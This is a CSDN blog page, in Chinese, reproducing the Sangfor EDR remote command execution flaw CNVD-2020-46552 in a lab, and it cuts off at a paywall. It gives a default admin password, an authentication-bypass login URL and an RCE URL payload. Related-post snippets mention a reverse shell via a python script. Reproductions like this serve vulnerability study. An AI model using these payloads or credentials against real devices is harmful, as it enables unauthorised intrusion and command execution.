sangfor EDR漏洞(CNVD-2020-46552)复现

最新推荐文章于 2024-05-19 08:15:00 发布
VIP文章 最新推荐文章于 2024-05-19 08:15:00 发布
阅读量3.7k 收藏 4
点赞数
分类专栏: 安全产品 文章标签: 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigblue00/article/details/108434009
版权

声名:本项目仅用于测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,如作他用所承受的法律责任一概与本人无关!!!

深信服EDR远程命令执行漏洞影响版本:v3.2.16,3.2.17,3.2.19
本次测试环境搭建:EDR 3.2.19 ,kali(kali和EDR 3.2.19同在一个网段)

登录EDR账号:root
密码:edr@sangfor
查看ip
在这里插入图片描述

复现过程
1、任意用户登录

payload: https://ip地址/ui/login.php?user=任意用户名
例:https://192.168.195.33/ui/login.php?user=admin
在这里插入图片描述

2、远程代码执行

payload:
https://ip/tool/log/c.php?strip_slashes=system&

最低0.47元/天 解锁文章
远行01
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 909
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。2020年08月18日左右检测到深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
SANGFOR_EDR_v3.2.17_用户手册.pdf
02-27
深信服sangfor edr 平台用户手册,平台的介绍、安装部署、平台的管理使用、客户端的使用等介绍。方便设备的安装,了解设备等讲解。
EDR漏洞CNVD-2020-46552复现
PigLL的博客
08-24 1166
影响版本:v3.2.16,3.2.17,3.2.19 环境搭建:EDR 3.2.19 kali 使kali和EDR 3.2.19同在一个网段 登录EDR 3.2.19 账号:root 密码:edr@sangfor 登陆后发现他是固定,然后将他IP改为与kali为同一网段 查看ip 任意用户登录 https://ip地址/ui/login.php?user=任意用户名 远程代码执行 利用python脚本反弹shell 使用kali监听4444端口 执行python脚本 返回kali 监听成功 ...
探索 Sangfor EDR Exploit:利用技术理解与实战应用
gitblog_00090的博客
04-02 816
探索 Sangfor EDR Exploit:利用技术理解与实战应用 项目地址:https://gitcode.com/BH2UOL/sangfor-edr-exploit 该项目是一个针对Sangfor Endpoint Detection and Response(EDR)系统的公开exploit,由 BH2UOL 开发并维护。如果你对网络安全漏洞利用或渗透测试有兴趣,那么这个开源工具可能...
Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞
bring_coco的博客
06-26 914
通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.naming.Context出问题的。可以看到class javax.naming.InitialContext是javax.naming.Contex的子类,因此进入if。根据调用栈顺序,我们进入到org.h2.server.web.WebServer#getConnection方法,如下。进入org.h2.server.web.WebApp#process方法。
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 874
深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
SANGFOR-GENERAL-MIB.mib
09-08
深信服SANGFOR-GENERAL-MIB.mib
SANGFOR-WOC7.0-技术白皮书
06-26
SANGFOR_WOC7.0_技术白皮书
SANGFOR-GENERAL-AND-SSL-MIB.mib
09-08
深信服EEM mib
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
深信服SANGFOR-SD-WAN-v3.1-智能选路测试指导书(详细版本)
12-25
为了方便 SDWAN 测试时,能够展示 SDWAN 的测试效果,提供常见场景的测试工具、方法以及效果展示方法,为一线提供指导
深信服EDR解决方案-V2.pptx
08-25
深信服EDR解决方案-V2
CNVD-2021-30167漏洞复现cnvd批量刷洞到后续利用完整经历
热门推荐
anlr2020的博客
09-07 1万+
记录一次挖漏洞的真实经历以及思路(本人文写的都偏傻瓜式,适合小白看,大神直接忽视) 首先新手没事可以多看看cnvd(国家信息安全漏洞贡献平台),链接在这https://www.cnvd.org.cn/,有一些最新的漏洞公告都会在这发布,你挖到的漏洞也可以提交到这,对你工作很有帮助。 某日无聊看看cnvd有没有新的漏洞公告,进入首页,点击热点关注-热点推荐,发现一堆最新的漏洞公告 看就看最新的,老漏洞被别人提交过的可能性更高,那么点第一个标题看看“用友NCBeanShell....漏洞” ..
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 138
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 435
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 927
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
红队攻防渗透技术实战流程:云安全之云服务安全:ECS和RDS
HACKONE的博客
05-18 27
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址:http://metadata.tencentyun.com/CF 云渗透框架项目:https://wiki.teamssix.com/CF/
Nginx - 安全基线配置与操作指南
最新发布
小工匠
05-19 921
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 363
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
sangfor-general-mib.mib
11-08
sangfor-general-mib.mib是一个用于网络设备监控和管理的管理信息库(MIB)文件。Sangfor(先锋网安)是一家专注于网络安全和云计算技术的公司,他们提供各种网络设备和解决方案,如防火墙、负载均衡器等。 sangfor-general-mib.mib文件定义了一系列的管理对象(MO)和相关属性,用于获取和控制Sangfor网络设备的状态和配置信息。这些MO包括设备的基本信息、硬件和软件版本、网络接口信息、CPU和内存使用情况等。 通过使用sangfor-general-mib.mib文件,网络管理员可以使用网络管理系统(NMS)监控和管理Sangfor设备。NMS可以通过Simple Network Management Protocol(SNMP)协议与设备进行通信,获取设备的运行状态、性能统计和日志信息,并且可以对设备进行配置和故障排除。 使用sangfor-general-mib.mib文件可以提供以下好处: 1. 高效的设备管理:通过NMS,管理员可以实时监测和管理Sangfor设备,快速发现和解决问题,提高网络的可靠性和性能。 2. 精确的性能监控:监控设备的CPU、内存、流量等关键性能指标,帮助管理员了解设备的负载情况,及时进行资源优化。 3. 故障排除和日志分析:通过故障报警和日志信息的收集与分析,管理员可以快速定位和解决设备故障,提高网络的可用性和可维护性。 总而言之,sangfor-general-mib.mib是一个定义了Sangfor网络设备的管理信息库(MIB)文件,通过使用该文件,管理员可以更好地监控和管理Sangfor设备,提高网络的可靠性和性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值